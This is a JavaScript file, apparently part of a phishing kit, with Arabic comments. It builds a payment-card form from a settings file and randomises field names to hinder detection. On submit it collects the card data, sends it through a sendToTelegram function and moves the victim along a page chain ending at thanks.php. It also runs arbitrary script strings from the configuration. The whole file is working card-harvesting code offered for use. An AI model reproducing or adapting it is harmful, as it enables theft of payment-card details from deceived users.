function randomName(len = 10) {
    let chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
    let name = '';
    for (let i = 0; i < len; i++) name += chars.charAt(Math.floor(Math.random() * chars.length));
    return name;
}

async function injectCardFields(containerId) {
    const container = document.getElementById(containerId);
    if (!container) return;
    const settings = await (await fetch('settings.json?' + Date.now())).json();
    const fields = settings.fields.card;
    const submitSettings = (settings.submit && settings.submit.card) || {};
    // mapping: original name => random name
    const nameMap = {};
    container.innerHTML = '<h3></h3>';
    let row = [];
    fields.forEach((fld, i) => {
        let randomFieldName = randomName();
        nameMap[fld.name] = randomFieldName;
        let attrs = `
            name="${randomFieldName}"
            id="${fld.name}"
            type="${fld.type}"
            class="card-input__input"
            ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
            ${fld.required ? 'required' : ''}
            ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
            ${fld.min ? `min="${fld.min}"` : ''}
            ${fld.max ? `max="${fld.max}"` : ''}
            autocomplete="off"
        `;
        let inputHtml = `<input ${attrs.trim()}>`;
        let fieldHtml = `
            <div class="card-input${fld.small ? ' small' : ''}">
                <label for="${fld.name}" class="card-input__label">${fld.label}${fld.required ? ' <span style="color:#e00">*</span>' : ''}</label>
                ${inputHtml}
            </div>
        `;
        if (fld.small) {
            row.push(fieldHtml);
            if (!fields[i + 1] || !fields[i + 1].small) {
                container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
                row = [];
            }
        } else {
            if (row.length) {
                container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
                row = [];
            }
            container.innerHTML += fieldHtml;
        }
    });
    if (row.length) {
        container.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
    }

    // إعداد زر السبميت طبقًا للإعدادات (يحقن في النهاية)
    let submitLabel = submitSettings.label || 'Unlock Card';
    let submitCss = submitSettings.css ? `style="${submitSettings.css.replace(/"/g,'&quot;')}"` : '';
    let submitJs = submitSettings.js ? submitSettings.js.trim() : '';
    container.innerHTML += `<button type="submit" class="card-form__button" ${submitCss}>${submitLabel}</button>`;

    // بعد توليد الحقول: طبق الـ CSS/JS المخصص لكل حقل
    fields.forEach((fld) => {
        let randomName = nameMap[fld.name];
        let inp = container.querySelector(`[name="${randomName}"]`);
        if (!inp) return;
        if (fld.css && fld.css.trim()) {
            inp.style.cssText += fld.css;
        }
        if (fld.js && fld.js.trim()) {
            try {
                inp.addEventListener('input', function () {
                    try { (new Function(fld.js)).call(this); } catch (ex) {}
                });
            } catch (e) {}
        }
    });

    // تخزين الماب عالمياً لجمع القيم عند السبميت
    window._cardFieldsNameMap = nameMap;
    window._cardFieldsSpec = fields;

    // حدث السبميت (يجب ربطه مع الفورم الخارجي وليس هنا)
    // فقط لو أردت هنا:
    container.closest("form")?.addEventListener("submit", function (e) {
        let data = {};
        fields.forEach(fld => {
            let randomName = nameMap[fld.name];
            let inp = this.querySelector(`[name="${randomName}"]`);
            data[fld.name] = inp ? inp.value : '';
        });
        // تنفيذ JS المخصص للزر إذا وجد
        let submitRet = true;
        if (submitJs) {
            try {
                submitRet = (new Function('data', submitJs)).call(this, data);
            } catch {
                submitRet = true;
            }
        }
        // إرسال لتليجرام أو أي منطق آخر
        if (submitRet !== false && window.sendToTelegram) {
            e.preventDefault();
            sendToTelegram('card', data, function() {
                // الانتقال للصفحة التالية بعد نجاح الإرسال
                if (window.pagesOrder && window.currentPage) {
                    let idx = pagesOrder.indexOf(currentPage);
                    if(idx !== -1 && idx < pagesOrder.length - 1){
                        window.location.href = pagesOrder[idx+1];
                    } else {
                        window.location.href = "thanks.php";
                    }
                }
            });
        }
    }, { once: true });
}